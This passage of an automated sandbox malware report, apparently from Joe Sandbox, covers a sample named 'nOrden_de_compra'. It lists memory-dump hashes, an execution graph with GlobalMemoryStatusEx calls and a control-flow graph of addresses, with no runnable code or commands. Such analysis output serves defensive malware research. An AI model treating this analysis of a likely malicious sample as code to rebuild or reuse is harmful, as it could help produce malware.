                                          • Opcode Fuzzy Hash: da2251bc9733cf8c393514dc4901c35760c825088edebf3b236f1f08a7f9e3c7
                                          • Instruction Fuzzy Hash: 6DE0C2B542920CEBC700EFA484046AE7BFCEB4A200F000DA5D90593110EF708E84EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc7397d9b7c58671a788fbd4fd4da2cbcad5a99490df804126fd4891420bebf8
                                          • Instruction ID: 814e09a81ac53cec9b9a8df55936b739a1401a3bc5e6ccd17e52fb3fa2df59f5
                                          • Opcode Fuzzy Hash: bc7397d9b7c58671a788fbd4fd4da2cbcad5a99490df804126fd4891420bebf8
                                          • Instruction Fuzzy Hash: 01E08C78918208EBC744DFD4D54966CBBB9AB86300F5082D88C0853380CB71AE52DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68a26177f97851a0093c7c77f4b52288895981aeec4b4920c3fd2d6453a140b0
                                          • Instruction ID: 655497b668450f110905b2a90248c1aafffcdeb5f4ce9fafd364d0b65b5c1682
                                          • Opcode Fuzzy Hash: 68a26177f97851a0093c7c77f4b52288895981aeec4b4920c3fd2d6453a140b0
                                          • Instruction Fuzzy Hash: 69E0ECB8935258EFC740DFA8D44969CBBF4BB09201F5001A9DD0893340FB709A85DB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 003801b341581ebf7b3e29c42f1b2e298f51a052d5dc9f6eb7761d14bace70d9
                                          • Instruction ID: 715b3ab78ccaa92c5676ad3b7481e0742c64e2e5e2f88f1847045b29a16c7e88
                                          • Opcode Fuzzy Hash: 003801b341581ebf7b3e29c42f1b2e298f51a052d5dc9f6eb7761d14bace70d9
                                          • Instruction Fuzzy Hash: 2CE07E7492122ACFEB14DF64DD45B9ABBB1BB49305F0046999809A2250CBB12E81CF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 505d34e5d9f5edcd84e9f19661d2e61ac48c19e68088633debbee076abd5ec04
                                          • Instruction ID: c31a189478d7a39b13b026e913cec9cb07dff1fb98d4247b7a47c928a8b792b8
                                          • Opcode Fuzzy Hash: 505d34e5d9f5edcd84e9f19661d2e61ac48c19e68088633debbee076abd5ec04
                                          • Instruction Fuzzy Hash: 79B012F53BC700F2B04D3A744C8997AF860EFA2B00F919C15730400078C8E0A565E31F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m
                                          • API String ID: 0-3775001192
                                          • Opcode ID: b4e1dbeda0ce74e4eeeb6ecdfa63ff9c91756a4d53a511281b9f9eb49ee2d4b9
                                          • Instruction ID: 69f2f49b60b8f9bd9df1c81d9ece71fe6362359de83e7c826011f4e6101859e4
                                          • Opcode Fuzzy Hash: b4e1dbeda0ce74e4eeeb6ecdfa63ff9c91756a4d53a511281b9f9eb49ee2d4b9
                                          • Instruction Fuzzy Hash: 72412FB1D15A588BEB5CCF6B8D4479AFAF7BFC9201F14C1BAC40CAA255EB7045868F01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m
                                          • API String ID: 0-3775001192
                                          • Opcode ID: 407b87fdb9413af1517e8cc9214093e8e50385786550c859e2f667e4e94f343d
                                          • Instruction ID: 9d2e0280fcb0b039ab4555ebf6e33ab9d49f2f0cabf19cc56eed085789723f9f
                                          • Opcode Fuzzy Hash: 407b87fdb9413af1517e8cc9214093e8e50385786550c859e2f667e4e94f343d
                                          • Instruction Fuzzy Hash: B54147B1D05A588BE75CCF6B8D4078AFAF3BFC9201F14C1BAC84CA6254EB7049468F01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 259a608263f232af97f88bfbfe232fc77f4a205bc2b0d2ac682dd5071c34979a
                                          • Instruction ID: bb21be4567ddf0babd2581c504d6c897d2c54ee4a0aeaafe0d85605de5eaeec4
                                          • Opcode Fuzzy Hash: 259a608263f232af97f88bfbfe232fc77f4a205bc2b0d2ac682dd5071c34979a
                                          • Instruction Fuzzy Hash: 5CF1E4B5720226EFD719DB38C49462E7BE6BF85300B1644A9D806CB362CF75DC42EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26afede9ce2864f6d317ec464165acb86905180ecab1ae9ba7b341d117483539
                                          • Instruction ID: 659500b4beee8c3c4472d6ceac738d2dc07a8e869ce21937ddc5c51d492879da
                                          • Opcode Fuzzy Hash: 26afede9ce2864f6d317ec464165acb86905180ecab1ae9ba7b341d117483539
                                          • Instruction Fuzzy Hash: 01E11CB4E006598FDB14DF99C590AAEFBF6BF89305F248269E814A7355C730AD42CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39e934ae780194398b55df070cdc083aeeb11229fef39fa5ed50c7d7a75999c4
                                          • Instruction ID: ed0a0ab43e27e713dc1cd92f65c954a4be38cff3e0a9db2078c9023919b4272f
                                          • Opcode Fuzzy Hash: 39e934ae780194398b55df070cdc083aeeb11229fef39fa5ed50c7d7a75999c4
                                          • Instruction Fuzzy Hash: 89E1FBB4E00A198FDB14DFA9C590AAEFBB6FF49304F248269D414A7355D730AD42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fcc9c0c3f9c6af90ee465c1e9688305f26f1c4c87b2899212aeff1e93f79d79
                                          • Instruction ID: 8cda29ffe9b7bb43fa029fddf8302c8fbd49fa7ba720b9248685f79483340a2c
                                          • Opcode Fuzzy Hash: 9fcc9c0c3f9c6af90ee465c1e9688305f26f1c4c87b2899212aeff1e93f79d79
                                          • Instruction Fuzzy Hash: 65E10CB4E006598FDB14DFA9C590AAEFBB6FF49304F248269D414AB355D730AD42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd93464c866f51ae1ba5b114ff8a16396751efaffdd4483700eff0a607e84ed0
                                          • Instruction ID: 95fc280a093c30adaec5ea02d1bafa01aa069bbf597ec898aa1aa24dc1996079
                                          • Opcode Fuzzy Hash: cd93464c866f51ae1ba5b114ff8a16396751efaffdd4483700eff0a607e84ed0
                                          • Instruction Fuzzy Hash: E7E11DB4E006598FDB14DFA9C590AAEFBB6FF89304F248159D414A7355D7309D42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ed95fde67a2ad215722d4defc667b21a038adc7785ee99f8aa9c23affae24b1
                                          • Instruction ID: 0d3a8f72301bc4bf06c5ccff620ecf7782aec1040e9444f349b727a1ec56434e
                                          • Opcode Fuzzy Hash: 7ed95fde67a2ad215722d4defc667b21a038adc7785ee99f8aa9c23affae24b1
                                          • Instruction Fuzzy Hash: 2FE11BB4E00619CFDB14DF98C590AAEFBB6BF49305F248169D414AB356D730AD42CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c422e4ccb670e9b2800b106f7973eb6256bbaa310cd0ce2a1083585a5239f02c
                                          • Instruction ID: b56c412c5d29aff41b569f8030b1013fab5717a3812edb47b94ece8ee2f85585
                                          • Opcode Fuzzy Hash: c422e4ccb670e9b2800b106f7973eb6256bbaa310cd0ce2a1083585a5239f02c
                                          • Instruction Fuzzy Hash: 24D1E5B4A04605CFDB18DF69C598EA9B7F5BF4D300F2580A8E506AB3A1DB31AD45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd3127013eb343a4dfb67b47c3111817420e66e009b9edce0b0e0bb8569ced35
                                          • Instruction ID: dde1212940092d9758500d6058fcde45268bf71eb278b20f537c831e6fd91b4d
                                          • Opcode Fuzzy Hash: bd3127013eb343a4dfb67b47c3111817420e66e009b9edce0b0e0bb8569ced35
                                          • Instruction Fuzzy Hash: 31A17332E1020A8FCF05DFB4D9845DEBBB2FF85300B2585AAE905AB265DB71D945CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd65514dde86f62ed3e332708eb83a2c1495872b90e454e91d13623753958a12
                                          • Instruction ID: 09dc2f95999633cefd8802e1437bb1578df0ee2f40926200b4eefe214b18db87
                                          • Opcode Fuzzy Hash: dd65514dde86f62ed3e332708eb83a2c1495872b90e454e91d13623753958a12
                                          • Instruction Fuzzy Hash: 10611974E116098BD748EF7AE84569ABFF2BBC8304F14D129D908E7258EF746946CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b7cce92848357c7302a0804bec77ccbb9f40ae447629bffbc9a1732b712a782
                                          • Instruction ID: 9f03846cc0e8120cee7d92156a65bc001b4b30b90d0e1b50cec8090cd158ce38
                                          • Opcode Fuzzy Hash: 8b7cce92848357c7302a0804bec77ccbb9f40ae447629bffbc9a1732b712a782
                                          • Instruction Fuzzy Hash: 9D610974A116098FD748EF7AE84469ABFF2BBC8304F14D529D808A7258EF746846CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b88267a5714c380670a18a90525443a7bda6557b6acd8d3afb25d1a4883d2fb
                                          • Instruction ID: 3ea3e977c7371494a268eac46606c53b3b5a509429c8d3a5e41f6b48fad49afe
                                          • Opcode Fuzzy Hash: 5b88267a5714c380670a18a90525443a7bda6557b6acd8d3afb25d1a4883d2fb
                                          • Instruction Fuzzy Hash: FC51E4B4E152299FCB04CFAAD5849AEFBF2FF88300F25D166D418A7215D730A942DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbe83aa06a7d34ad233747ca8b9ae041226cb47cde2832b5c0db53c0f11f4cd5
                                          • Instruction ID: 762e7ad017a8c3612841cd6cda5581cf23bc314d544d1c1e3fc6411f2a844001
                                          • Opcode Fuzzy Hash: cbe83aa06a7d34ad233747ca8b9ae041226cb47cde2832b5c0db53c0f11f4cd5
                                          • Instruction Fuzzy Hash: 56515DB4E006598FDB14CFA9C5805AEFBF2FF89304F248169D418A7256D7309D42CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 91b1db1726fab08a765c7e3c26c0475bfb52a11de5c7ab98364177fbf3ecec04
                                          • Instruction ID: 54428d72cd2c7025e8e32c475bcff07a2097f3e1545a8d1d82953311cae27c62
                                          • Opcode Fuzzy Hash: 91b1db1726fab08a765c7e3c26c0475bfb52a11de5c7ab98364177fbf3ecec04
                                          • Instruction Fuzzy Hash: 06512BB4E006598FDB15CFA9C9805AEFBF6FF89304F24816AD418A7356D7309942CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7d959b89fed2f6416c05884e2557852416b287c3c006c168afd320396081425
                                          • Instruction ID: 3742ecc5d97835a554117428689740c2ae3fc056a61d14680afa9b0e8ee50c0f
                                          • Opcode Fuzzy Hash: d7d959b89fed2f6416c05884e2557852416b287c3c006c168afd320396081425
                                          • Instruction Fuzzy Hash: 435109B4E006198FDB14CFA9C5806AEFBF6BF89304F248169D418A7356D7319942CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:12%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:31
                                          Total number of Limit Nodes:4
                                          execution_graph 24241 2cd0848 24243 2cd084e 24241->24243 24242 2cd091b 24243->24242 24245 2cd1383 24243->24245 24246 2cd138a 24245->24246 24247 2cd1488 24246->24247 24251 2cd7d48 24246->24251 24255 2cd7da0 24246->24255 24259 2cd7eb8 24246->24259 24247->24243 24253 2cd7da0 24251->24253 24252 2cd7f22 24252->24246 24253->24252 24266 2cdf4c7 24253->24266 24257 2cd7db6 24255->24257 24256 2cd7f22 24256->24246 24257->24256 24258 2cdf4c7 2 API calls 24257->24258 24258->24256 24260 2cd7ec2 24259->24260 24261 2cd7edc 24260->24261 24263 6b8fab8 2 API calls 24260->24263 24264 6b8faa8 2 API calls 24260->24264 24262 2cd7f22 24261->24262 24265 2cdf4c7 2 API calls 24261->24265 24262->24246 24263->24261 24264->24261 24265->24262 24267 2cdf4d2 24266->24267 24271 6b8fab8 24267->24271 24275 6b8faa8 24267->24275 24268 2cdf4d9 24268->24252 24273 6b8facd 24271->24273 24272 6b8fce2 24272->24268 24273->24272 24274 6b8fcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24273->24274 24274->24273 24277 6b8facd 24275->24277 24276 6b8fce2 24276->24268 24277->24276 24278 6b8fcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24277->24278 24278->24277

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 71 6b855e0-6b855fd 72 6b855ff-6b85602 71->72 73 6b85628-6b8562b 72->73 74 6b85604-6b85623 72->74 75 6b8562d-6b85630 73->75 76 6b85635-6b85638 73->76 74->73 75->76 78 6b8563a-6b85649 76->78 79 6b8564e-6b85651 76->79 78->79 80 6b8565d-6b85660 79->80 81 6b85653-6b8565c 79->81 82 6b8567a-6b8567d 80->82 83 6b85662-6b8566c 80->83 86 6b8567f-6b85681 82->86 87 6b85684-6b85687 82->87 88 6b85673-6b85675 83->88 86->87 89 6b85689-6b8568f 87->89 90 6b856bf-6b856c2 87->90 88->82 91 6b857af-6b857db 89->91 92 6b85695-6b8569d 89->92 93 6b856d1-6b856d4 90->93 94 6b856c4-6b856ca 90->94 104 6b857e5-6b857e8 91->104 92->91 95 6b856a3-6b856b0 92->95 97 6b856e2-6b856e5 93->97 98 6b856d6-6b856dd 93->98 94->89 96 6b856cc 94->96 95->91 102 6b856b6-6b856ba 95->102 96->93 100 6b856f9-6b856fc 97->100 101 6b856e7-6b856f4 97->101 98->97 100->94 103 6b856fe-6b85701 100->103 101->100 102->90 106 6b8570b-6b8570e 103->106 107 6b85703-6b85706 103->107 108 6b857f9-6b857fc 104->108 109 6b857ea-6b857f4 104->109 110 6b85710-6b85711 106->110 111 6b85716-6b85719 106->111 107->106 112 6b8581e-6b85821 108->112 113 6b857fe-6b85802 108->113 109->108 110->111 114 6b8571b-6b8572d 111->114 115 6b85732-6b85735 111->115 119 6b85843-6b85846 112->119 120 6b85823-6b85827 112->120 117 6b85808-6b85810 113->117 118 6b858d6-6b85914 113->118 114->115 121 6b85752-6b85755 115->121 122 6b85737-6b8574d 115->122 117->118 127 6b85816-6b85819 117->127 142 6b85916-6b85919 118->142 123 6b85848-6b8584c 119->123 124 6b85864-6b85867 119->124 120->118 129 6b8582d-6b85835 120->129 125 6b8576e-6b85774 121->125 126 6b85757-6b8575a 121->126 122->121 123->118 131 6b85852-6b8585a 123->131 134 6b85869-6b8587a 124->134 135 6b8587f-6b85882 124->135 125->83 137 6b8577a 125->137 132 6b85769-6b8576c 126->132 133 6b8575c-6b85762 126->133 127->112 129->118 138 6b8583b-6b8583e 129->138 131->118 139 6b8585c-6b8585f 131->139 132->125 141 6b8577f-6b85782 132->141 133->107 140 6b85764 133->140 134->135 143 6b85892-6b85895 135->143 144 6b85884-6b8588b 135->144 137->141 138->119 139->124 140->132 148 6b8578f-6b85791 141->148 149 6b85784-6b85788 141->149 146 6b8591f-6b85ab3 142->146 147 6b85c02-6b85c05 142->147 152 6b858af-6b858b2 143->152 153 6b85897-6b8589b 143->153 150 6b8588d 144->150 151 6b858ce-6b858d5 144->151 220 6b85ab9-6b85ac0 146->220 221 6b85bec-6b85bff 146->221 147->146 154 6b85c0b-6b85c0e 147->154 157 6b85798-6b8579b 148->157 158 6b85793 148->158 155 6b8578a 149->155 156 6b857a1-6b857ae 149->156 150->143 160 6b858bc-6b858be 152->160 161 6b858b4-6b858bb 152->161 153->118 159 6b8589d-6b858a5 153->159 164 6b85c18-6b85c1b 154->164 165 6b85c10-6b85c15 154->165 155->148 157->72 157->156 158->157 159->118 167 6b858a7-6b858aa 159->167 162 6b858c0 160->162 163 6b858c5-6b858c8 160->163 162->163 163->104 163->151 168 6b85c1d-6b85c30 164->168 169 6b85c33-6b85c36 164->169 165->164 167->152 169->146 170 6b85c3c-6b85c3f 169->170 173 6b85c59-6b85c5c 170->173 174 6b85c41-6b85c52 170->174 175 6b85c6a-6b85c6d 173->175 176 6b85c5e-6b85c65 173->176 174->176 181 6b85c54 174->181 178 6b85c6f-6b85c80 175->178 179 6b85c87-6b85c8a 175->179 176->175 178->168 191 6b85c82 178->191 183 6b85c8c-6b85c9d 179->183 184 6b85ca4-6b85ca7 179->184 181->173 183->176 196 6b85c9f 183->196 186 6b85ca9-6b85cba 184->186 187 6b85cc1-6b85cc4 184->187 186->183 197 6b85cbc 186->197 189 6b85cde-6b85ce1 187->189 190 6b85cc6-6b85cd7 187->190 194 6b85cef-6b85cf1 189->194 195 6b85ce3-6b85cea 189->195 190->176 202 6b85cd9 190->202 191->179 200 6b85cf8-6b85cfb 194->200 201 6b85cf3 194->201 195->194 196->184 197->187 200->142 203 6b85d01-6b85d0a 200->203 201->200 202->189 222 6b85b74-6b85b7b 220->222 223 6b85ac6-6b85af9 220->223 222->221 224 6b85b7d-6b85bb0 222->224 234 6b85afb 223->234 235 6b85afe-6b85b3f 223->235 236 6b85bb2 224->236 237 6b85bb5-6b85be2 224->237 234->235 245 6b85b41-6b85b52 235->245 246 6b85b57-6b85b5e 235->246 236->237 237->203 245->203 248 6b85b66-6b85b68 246->248 248->203
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-3993045852
                                          • Opcode ID: 9e3cd6d560a8f2f5d87acd3d2620952a72786a900edd26bba00e41f768ff9c65
                                          • Instruction ID: 732c78d1affc1f91bc424924b90ae8193ade156e73dbe2fd391e16dbac411761
                                          • Opcode Fuzzy Hash: 9e3cd6d560a8f2f5d87acd3d2620952a72786a900edd26bba00e41f768ff9c65
                                          • Instruction Fuzzy Hash: 9022C676E002199FDFA4EBA5C4806AEBBB2FF85310F2485A9D405EB395DB35DC41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 028061247b5679d60b310d967d51b754c967a6d3f728c51b88359629478c6dcd
                                          • Instruction ID: a145a8000b47db83b0169daaccee044124881047878d38b06bcbabdf7dbf7d94
                                          • Opcode Fuzzy Hash: 028061247b5679d60b310d967d51b754c967a6d3f728c51b88359629478c6dcd
                                          • Instruction Fuzzy Hash: 64922674A00204CFDB64EB68C584B6DBBF2EF45314F5494AAD409AB3A5DB35ED82CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4a06e12862a601ab44e0c8a9734cb8de1f4d40b8283c9adb4370f27ad9002f26
                                          • Instruction ID: 1d9530b50c264d834aa8bad6f104e87680db1fb95cd89ab107b056cafb6bee26
                                          • Opcode Fuzzy Hash: 4a06e12862a601ab44e0c8a9734cb8de1f4d40b8283c9adb4370f27ad9002f26
                                          • Instruction Fuzzy Hash: EF62A074B00215CFDB54EBA8D544BADB7B2EF88314F2495A9D806DB390EB75EC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1502 6b8c1f0-6b8c210 1503 6b8c212-6b8c215 1502->1503 1504 6b8c23e-6b8c241 1503->1504 1505 6b8c217-6b8c239 1503->1505 1506 6b8c259-6b8c25c 1504->1506 1507 6b8c243-6b8c254 1504->1507 1505->1504 1508 6b8c288-6b8c28b 1506->1508 1509 6b8c25e-6b8c283 1506->1509 1507->1506 1511 6b8c2ab-6b8c2ae 1508->1511 1512 6b8c28d-6b8c2a6 1508->1512 1509->1508 1516 6b8c4b3-6b8c4bc 1511->1516 1517 6b8c2b4-6b8c2b7 1511->1517 1512->1511 1518 6b8c32f-6b8c338 1516->1518 1519 6b8c4c2 1516->1519 1521 6b8c2b9-6b8c2dd 1517->1521 1522 6b8c2e2-6b8c2e5 1517->1522 1523 6b8c33e-6b8c342 1518->1523 1524 6b8c587-6b8c5bd 1518->1524 1529 6b8c4c7-6b8c4ca 1519->1529 1521->1522 1526 6b8c2f5-6b8c2f8 1522->1526 1527 6b8c2e7-6b8c2ee 1522->1527 1531 6b8c347-6b8c34a 1523->1531 1552 6b8c5bf-6b8c5c2 1524->1552 1532 6b8c2fa-6b8c2fd 1526->1532 1534 6b8c302-6b8c305 1526->1534 1527->1532 1533 6b8c2f0 1527->1533 1535 6b8c4cc-6b8c4d5 1529->1535 1536 6b8c4e7-6b8c4ea 1529->1536 1537 6b8c34c-6b8c355 1531->1537 1538 6b8c360-6b8c363 1531->1538 1532->1534 1533->1526 1541 6b8c30f-6b8c312 1534->1541 1542 6b8c307-6b8c30c 1534->1542 1535->1524 1543 6b8c4db-6b8c4e2 1535->1543 1544 6b8c4ec-6b8c4f2 1536->1544 1545 6b8c4f7-6b8c4fa 1536->1545 1537->1535 1549 6b8c35b 1537->1549 1550 6b8c370-6b8c373 1538->1550 1551 6b8c365-6b8c36b 1538->1551 1553 6b8c32a-6b8c32d 1541->1553 1554 6b8c314-6b8c325 1541->1554 1542->1541 1543->1536 1544->1545 1546 6b8c4fc-6b8c520 1545->1546 1547 6b8c525-6b8c528 1545->1547 1546->1547 1555 6b8c53a-6b8c53d 1547->1555 1556 6b8c52a-6b8c535 1547->1556 1549->1538 1557 6b8c393-6b8c396 1550->1557 1558 6b8c375-6b8c38e 1550->1558 1551->1550 1559 6b8c5ee-6b8c5f1 1552->1559 1560 6b8c5c4-6b8c5dd 1552->1560 1553->1518 1553->1531 1554->1553 1565 6b8c55d-6b8c560 1555->1565 1566 6b8c53f-6b8c558 1555->1566 1556->1555 1567 6b8c398-6b8c3b1 1557->1567 1568 6b8c3b6-6b8c3b9 1557->1568 1558->1557 1561 6b8c5f3-6b8c60f 1559->1561 1562 6b8c614-6b8c617 1559->1562 1601 6b8c5e3-6b8c5ed 1560->1601 1602 6b8c677-6b8c683 1560->1602 1561->1562 1574 6b8c619-6b8c623 1562->1574 1575 6b8c624-6b8c627 1562->1575 1570 6b8c56a-6b8c56c 1565->1570 1571 6b8c562-6b8c567 1565->1571 1566->1565 1567->1568 1572 6b8c3bb-6b8c3ca 